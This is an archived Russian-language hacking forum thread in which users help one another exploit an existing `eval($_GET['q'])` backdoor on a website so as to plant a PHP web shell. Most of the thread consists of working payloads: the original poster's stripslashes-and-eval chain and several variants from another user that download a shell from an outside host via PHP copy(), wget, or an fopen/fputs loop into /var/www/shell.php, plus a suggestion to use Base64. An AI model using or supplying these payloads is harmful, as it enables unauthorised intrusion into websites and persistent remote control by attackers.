PDA

Просмотр полной версии : Помогите воспользоваться уязвимостью


LamerHacker
23.09.2010, 21:49
Есть одна уязвимость, точнее Бэкдор в одном скрипте


PHP:
eval ($_GET['q']);

Хочу залить на сайт шелл, проблема в том, что кавычки в параметрах $_GET экранизируется, поэтому ничего не выходит

LamerHacker
23.09.2010, 22:14
Пока ждал ответа мысль сама пришла в голову

Если кому интересно, то вот мой вариант

index.php?q=$_GET[q2]=stripslashes($_GET[q2]);eval($_GET[q2]);&q2=copy("http://site.ru/shell.txt","shell.php");

Redwood
24.09.2010, 08:23
Code:


или


Code:




Code:
cmd=copy('http://site.ru/shell.txt','/var/www/shell.php');

Без stripslashes


Code:




Code:
cmd=copy($_REQUEST[a],$_REQUEST[b]);&a=http://site.ru/shell.txt&b=/var/www/shell.php

Через wget, curl, fetch и другие качалки


Code:




Code:
cmd=wget http://site.ru/shell.txt -O /var/www/shell.php

Ну, а если, все таки, очень хочется по извращаться


Code:
eval($_REQUEST[cmd]);



Code:
cmd=$a=fopen($_REQUEST[b],$_REQUEST[bb]);$b=fopen($_REQUEST[c],$_REQUEST[cc]);while(!feof($a)){$res=fgets($a);fputs($b,$res);}&bb=b&cc=w+&b=http://site.ru/shell.txt&c=/var/www/shell.php

kfor
24.09.2010, 10:16
Я бы ваапще использовал Base64.

попугай
24.09.2010, 14:34
Redwood, видимо, он править не имеет возможности скрипт, поэтому юзать только может eval ($_GET['q']); (то, что какой-то хацкер прописал до него)